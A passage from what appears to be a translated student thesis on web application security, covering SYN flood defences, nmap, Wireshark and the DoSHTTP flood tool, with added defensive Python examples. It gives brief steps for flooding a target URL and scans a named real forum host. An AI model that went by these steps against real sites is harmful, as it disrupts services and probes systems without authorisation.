Queue overflow through many connections can be avoided, but this approach consumes a lot of resources:

- Reduce the connection setup time
- Use software that detects and defeats DoS attacks: most current operating systems support detecting and preventing SYN flood attacks. There is also software specifically able to avoid this kind of attack. For example, Linux kernels from 2.0.30 onward include an option called SYN Cookie: the kernel is responsible for tracking and recording possible occurrences of the SYN technique, and then uses a cryptographic scheme, the SYN cookie, that allows legitimate users of the system to keep connecting to it. Windows NT 4.0 and later use the backlog technique: whenever the connection queue cannot keep up, the system automatically allocates more resources to the queue, so the queue does not collapse.

The application should allow each client machine to establish only a set maximum number of connections, to avoid the hacker sending many requests at once and causing congestion.
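The two countermeasures above, SYN cookies and a per-client connection cap, as an added example in Python (not code from the thesis, the Linux kernel or Windows). The cookie layout is a simplified version of the SYN cookie idea: the server's initial sequence number carries a time counter, an encoded MSS and a keyed hash of the connection 4-tuple, so no half-open state has to be stored until the client's ACK proves the handshake is real. The secret, addresses and MSS table are constructed for the demo.

```python
"""SYN cookies and a per-client connection cap.

Added example, not code from the thesis, the Linux kernel or Windows. The
cookie layout is a simplified version of the SYN cookie idea; the secret,
addresses and MSS table are constructed for the demonstration.
"""
import hashlib
import hmac

SECRET = b"constructed-demo-secret"      # real servers use a random, rotated key
MSS_TABLE = [536, 1220, 1440, 1460]      # MSS values that fit in the 3-bit field
SLOT_SECONDS = 64                         # granularity of the time counter


def _tag(src_ip, src_port, dst_ip, dst_port, counter):
    """24-bit keyed hash binding the cookie to the 4-tuple and time slot."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src_ip, src_port, dst_ip, dst_port, client_mss, now_s):
    """Initial sequence number for the SYN/ACK. The server stores nothing.

    Layout (32 bits): 5-bit time counter | 3-bit MSS index | 24-bit tag.
    """
    counter = (int(now_s) // SLOT_SECONDS) & 0x1F
    fits = [i for i, m in enumerate(MSS_TABLE) if m <= client_mss]
    mss_idx = max(fits) if fits else 0     # largest table entry <= client's MSS
    return (counter << 27) | (mss_idx << 24) | _tag(src_ip, src_port, dst_ip, dst_port, counter)


def check_syn_cookie(ack_number, src_ip, src_port, dst_ip, dst_port, now_s,
                     max_age_slots=1):
    """Validate the ACK number of the third handshake packet.

    Returns the MSS to use for the connection, or None when the cookie is
    stale, was forged, or belongs to a different 4-tuple.
    """
    cookie = (ack_number - 1) & 0xFFFFFFFF     # the client acknowledges ISN + 1
    counter = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    tag = cookie & 0xFFFFFF
    current = (int(now_s) // SLOT_SECONDS) & 0x1F
    if ((current - counter) & 0x1F) > max_age_slots:
        return None                               # too old: reject
    expected = _tag(src_ip, src_port, dst_ip, dst_port, counter)
    if not hmac.compare_digest(tag.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None                               # forged or wrong 4-tuple
    if mss_idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[mss_idx]


class PerClientLimiter:
    """Application-level cap on concurrent connections from one client IP."""

    def __init__(self, max_per_client=10):
        self.max_per_client = max_per_client
        self.active = {}

    def connect(self, client_ip):
        """Return True if the connection may be accepted, False to reject it."""
        n = self.active.get(client_ip, 0)
        if n >= self.max_per_client:
            return False
        self.active[client_ip] = n + 1
        return True

    def disconnect(self, client_ip):
        n = self.active.get(client_ip, 0) - 1
        if n <= 0:
            self.active.pop(client_ip, None)
        else:
            self.active[client_ip] = n
```

On a modern Linux host the kernel's own implementation is switched on with the sysctl `net.ipv4.tcp_syncookies=1`; the class at the end is the application-level limit the last paragraph describes and would sit in the web server's accept loop.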

CHAPTER 3: INTRODUCTION TO SOME COMMON TOOLS IN WEB APPLICATION ATTACK AND SECURITY TECHNIQUES

3.1. Scanning tools

In web application attack as well as security work, the first step is usually to check the system for flaws in order to identify where it is vulnerable. Vulnerability scanning tools greatly assist this work: hackers can use them to find flaws and then use a framework or ready-made code, available in various documents or on the internet, to attack the web application. But they are also useful tools for network administrators and web application administrators, who can use them to check the security level of their web application systems and then find the right security measures or fix the flaws accordingly.

In this project I will introduce a very widely used open source scanning tool, nmap. Nmap is very easy to use: you can run it from the command line in a DOS window, or use the options directly in nmap's own graphical interface.

Figure 1: the nmap interface

Thanks to its user-friendly interface, nmap is very easy to use. Below is an illustration on a web application, the host forum.congthuongit.net. Enter Target: forum.congthuongit.net and Profile: Intense scan. We obtain the following results.

Figure 2: nmap's Intense scan profile

Figure 3: results of the nmap run (Nmap Output tab)

Figure 4: results in the Nmap Output tab (continued)

This is the view of the protocols found on the web application system.

Figure 5: the host being examined

Although it has a great many functions, there are times when nmap cannot determine the target's parameters precisely. In the case above, Nmap could not identify the host's software (no OS matches for host). After you scan a host with nmap, it can happen that the website becomes unreachable for a while; do not worry, a few minutes later you will be able to access it again.
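As an added example (not from the thesis), here is how an administrator can turn an nmap run on their own host into an automatic check rather than reading the GUI by eye. The Python below parses nmap's greppable output format (the `-oG` option) and compares the open ports against an allowlist of the services that are supposed to be exposed. The sample output, addresses and allowlist are constructed, and the second host deliberately has no OS line, the "no OS matches for host" situation mentioned above.

```python
"""Auditing open ports from nmap's greppable (-oG) output.

Added example, not from the thesis. The sample output, host names,
addresses and allowlist are constructed; the format mirrors nmap's
greppable output, one tab-separated record per host line.
"""
import re

CONSTRUCTED_GREPABLE = (
    "# Nmap 7.80 scan initiated (constructed sample, not a real run)\n"
    "Host: 192.0.2.10 (www.example.test)\tStatus: Up\n"
    "Host: 192.0.2.10 (www.example.test)\tPorts: "
    "22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//nginx 1.14.2/, "
    "3306/open/tcp//mysql//MySQL 5.7/, 25/filtered/tcp//smtp///"
    "\tIgnored State: closed (996)\tOS: Linux 4.15 - 5.6\n"
    "Host: 192.0.2.11 (db.example.test)\tStatus: Up\n"
    "Host: 192.0.2.11 (db.example.test)\tPorts: 443/open/tcp//https//Apache httpd/"
    "\tIgnored State: closed (999)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)

HOST_RE = re.compile(r"Host: (\S+) \((.*?)\)")


def parse_grepable(text):
    """Return {ip: {"name", "ports": [...], "os"}} from greppable output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                  # comments and blank lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, name = m.group(1), m.group(2) or None
        rec = hosts.setdefault(ip, {"name": name, "ports": [], "os": None})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Ports":
                for entry in value.split(", "):
                    # port/state/protocol/owner/service/rpcinfo/version/
                    p = entry.split("/")
                    rec["ports"].append({"port": int(p[0]), "state": p[1],
                                         "proto": p[2], "service": p[4],
                                         "version": p[6]})
            elif key == "OS":
                rec["os"] = value   # field is absent when nmap found no OS match
    return hosts


def unexpected_open_ports(hosts, allowlist):
    """Open ports that are not in the per-host allowlist: {ip: [port, ...]}."""
    findings = {}
    for ip, rec in hosts.items():
        allowed = allowlist.get(ip, set())
        bad = sorted(p["port"] for p in rec["ports"]
                     if p["state"] == "open" and p["port"] not in allowed)
        if bad:
            findings[ip] = bad
    return findings


if __name__ == "__main__":
    scan = parse_grepable(CONSTRUCTED_GREPABLE)
    print(unexpected_open_ports(scan, {"192.0.2.10": {22, 80}, "192.0.2.11": {443}}))
```

Run against a real scan of your own host (`nmap -sV -oG scan.gnmap <host>`), the same two functions turn an exposed database port like the 3306 in the sample into a finding instead of a screenshot to be read by hand.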

2. Packet capture tools

Using a packet capture tool is a common way to eavesdrop on packets on the network. In this project I will introduce Wireshark, an open source tool with a friendly graphical interface that is easy to use.

Figure 6: the Wireshark interface

Click Interface List, choose the network card and click Start. You then get the following screen (figure 7).

The yellow area shows the packets being transmitted to you. The area below shows the information of the packet encoded in hexadecimal form.

Figure 7: the Wireshark interface while capturing packets

When you click on the hex pane or on one of the information rows, you get the encoded information of that packet, as in the figure below.

Figure 8: information on the packets captured by Wireshark

You can save this information and use it later. Your next task is to find additional software to decode this encoded data and read the packets' contents.
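The hexadecimal pane described above is just the raw bytes of the frame; decoding them needs nothing more than the header layouts. As an added example (not part of the thesis or of Wireshark) the Python below decodes a constructed Ethernet/IPv4/TCP frame, given as a hex string of the kind the hex pane shows, into the fields that Wireshark's detail pane displays, and verifies the IPv4 header checksum. The frame, its addresses and ports are all constructed; the TCP checksum is not verified here because it covers a pseudo-header as well.

```python
"""Decoding a captured frame's hex bytes into Ethernet/IPv4/TCP fields.

Added example, not from the thesis or Wireshark. The frame below is
constructed: a TCP SYN/ACK from 192.0.2.10:443 to 198.51.100.5:51515.
"""
import struct

CONSTRUCTED_FRAME_HEX = (
    "001122334455" "66778899aabb" "0800"                # Ethernet: dst, src, type IPv4
    "4500" "0028" "1c46" "4000" "4006" "3247"            # IPv4: ver/ihl, tos, len, id, flags, ttl/proto, csum
    "c000020a" "c6336405"                                # IPv4: src 192.0.2.10, dst 198.51.100.5
    "01bb" "c93b" "12345678" "0a0b0c0d"                  # TCP: ports, seq, ack
    "5012" "ffff" "0000" "0000"                          # TCP: offset/flags SYN+ACK, window, csum, urg
)

TCP_FLAGS = (("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04),
             ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20))


def ip_checksum(header):
    """RFC 1071 one's-complement sum; returns 0 when a header checks out."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def decode_frame(hex_dump):
    """Parse Ethernet, then IPv4, then TCP; stop early for other protocols."""
    raw = bytes.fromhex(hex_dump)
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", raw[:14])
    out = {"eth": {"dst": _mac(dst_mac), "src": _mac(src_mac), "type": ethertype}}
    if ethertype != 0x0800:
        return out
    ip = raw[14:]
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    out["ip"] = {
        "version": ver_ihl >> 4, "header_len": ihl, "total_length": total_len,
        "id": ident, "dont_fragment": bool(flags_frag & 0x4000),
        "ttl": ttl, "protocol": proto,
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
        "checksum_ok": ip_checksum(ip[:ihl]) == 0,   # sum over header incl. csum is 0
    }
    if proto != 6:
        return out
    tcp = ip[ihl:total_len]
    (sport, dport, seq, ack, off_flags, window,
     _tcsum, _urg) = struct.unpack("!HHIIHHHH", tcp[:20])
    data_off = (off_flags >> 12) * 4                  # header length incl. options
    out["tcp"] = {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
        "flags": [name for name, bit in TCP_FLAGS if off_flags & bit],
        "window": window, "payload_len": len(tcp) - data_off,
    }
    return out


if __name__ == "__main__":
    print(decode_frame(CONSTRUCTED_FRAME_HEX))
```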

3 Tools for DoS attacks on web applications

As presented in chapter 2, the DoS attack is a classic method that is hard to prevent. Here I will introduce the tool DoSHTTP 2.5, a very widespread tool for DoS attacks on web applications and one that hackers often use. The DoSHTTP 2.5 interface is shown in figure 9.

Figure 9: the DoSHTTP 2.5 interface

Working with this tool is very easy: the hacker only has to enter the address to be DDoSed in the Target URL field, choose the number of sockets and press Start Flood. After that it is just a matter of sitting and waiting; about 5 minutes later the host is no longer reachable. Warning: attacking web applications is against the law, so you must not use this tool carelessly.
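A flood like the one this tool produces is a burst of HTTP requests from a small set of clients. As an added example (not from the thesis or from DoSHTTP), the Python below applies a per-client token bucket, the mechanism behind web-server request limiting, to a constructed access log in common log format: each client gets a small burst allowance that refills at a fixed rate, so a client hammering the server is throttled while normal clients are untouched. The log lines, addresses, timestamps and limits are constructed.

```python
"""Per-client token-bucket request limiting, replayed over an access log.

Added example, not from the thesis or from DoSHTTP. The log lines,
addresses, timestamps and limits are all constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')

_FLOOD = "\n".join(
    '198.51.100.9 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 5120'
    for _ in range(10))
CONSTRUCTED_ACCESS_LOG = "\n".join([
    '203.0.113.7 - - [10/Oct/2023:13:55:30 +0000] "GET / HTTP/1.1" 200 5120',
    _FLOOD,                                   # 10 requests within one second
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /login HTTP/1.1" 200 2048',
    '203.0.113.8 - - [10/Oct/2023:13:55:41 +0000] "GET /about HTTP/1.1" 200 1024',
    '198.51.100.9 - - [10/Oct/2023:13:55:46 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "POST /login HTTP/1.1" 302 0',
])


def parse_line(line):
    """One common-log-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return {"ip": m["ip"], "ts": ts, "request": m["req"], "status": int(m["status"])}


class TokenBucket:
    """`burst` tokens at most, refilled at `rate_per_s`; one token per request."""

    def __init__(self, rate_per_s, burst):
        self.rate, self.burst = rate_per_s, burst
        self.tokens, self.last = burst, None

    def allow(self, now):
        if self.last is not None:
            self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


def apply_token_bucket(log_text, rate_per_s=1.0, burst=3):
    """Replay the log in time order; count allowed/rejected requests per client."""
    buckets = {}
    outcome = defaultdict(lambda: {"allowed": 0, "rejected": 0})
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    for rec in sorted(records, key=lambda r: r["ts"]):
        bucket = buckets.setdefault(rec["ip"], TokenBucket(rate_per_s, burst))
        outcome[rec["ip"]]["allowed" if bucket.allow(rec["ts"]) else "rejected"] += 1
    return dict(outcome)


if __name__ == "__main__":
    print(apply_token_bucket(CONSTRUCTED_ACCESS_LOG))
```

The same idea is what a web server's request-limiting module implements in front of the application (nginx's `limit_req_zone` and `limit_req` directives, for example); the rejected requests are answered cheaply, so the sockets the flood tool opens are not allowed to tie up application workers.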


CONCLUSION AND FUTURE DIRECTION OF THE PROJECT

Web applications are developing at a dizzying pace, and therefore web application attack and security techniques are also developing to a high level. Web application attack and security is a very broad topic that demands deep understanding and high professional skill. Because the time for this project was short and my skills are still limited, what I have presented in this project is only basic knowledge and still has many shortcomings. However, with the dedicated help of the teachers in the Faculty of Information Technology, especially Mr. Huỳnh Nguyễn Thành Luân, and precisely because I was assigned and carried out this project, I now understand more clearly the technical concepts related to web applications that I had not fully grasped before. I also understand better the basic application attack techniques that form the foundation for modern attack methods, and at the same time I have learned some methods for preventing attacks and securing web applications.

This knowledge will help me greatly in the future. It gives me a firmer foundation in the professional techniques related to web application security. After completing this project I will use the knowledge I have gained and try to learn more, studying further related professional knowledge in order to build a tool or a method for securing web applications effectively against attacks.


References

In this project I consulted many articles by various authors, especially on the internet; the sources are listed below.

Graduation thesis "Research on some web application security issues on the internet" by Nguyễn Duy Thng and Nguyễn Minh Th.

ETHICAL HACKING 1-5 by EC-Council

http://vietbao.vn/Vi-tinh-Vien-thong/Tim-hieu-ve-cac-ung-dung-Web/65082882/229/

http://iht.vn/mang-bao-mat/505-tim-hieu-ve-cac-ung-dung-web.html

http://www.onboom.com/kien-thuc-ve-web/quang-ba-website/1598-kien-truc-net-trong-mo-hinh-ung-dung-thuong-mai-dien-tu.html

http://www.vnsolutions.net/cms/vi/chi-tiet/ung-dung-web-(webapp)-la-gi/30

http://vovanhai.wordpress.com/web/jsp/mo-hinh-mvc-va-1-vi-d%E1%BB%A5-%E1%BB%A9ng-d%E1%BB%A5ng/

http://web.dongtak.net/spip.php?article125

http://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.html

Saved web page (.htm): "A little about website security for non-specialists"

Saved web page (.htm): "How to hack websites" - YuMe_vn

Saved web page (.htm): "How to attack Cisco systems (Page 1)" - CISCO network systems - Zonotek center forum - Powered by Discuz! Archiver

Saved web page (.htm): thuynt' Blog - "Common security vulnerabilities on websites"

The end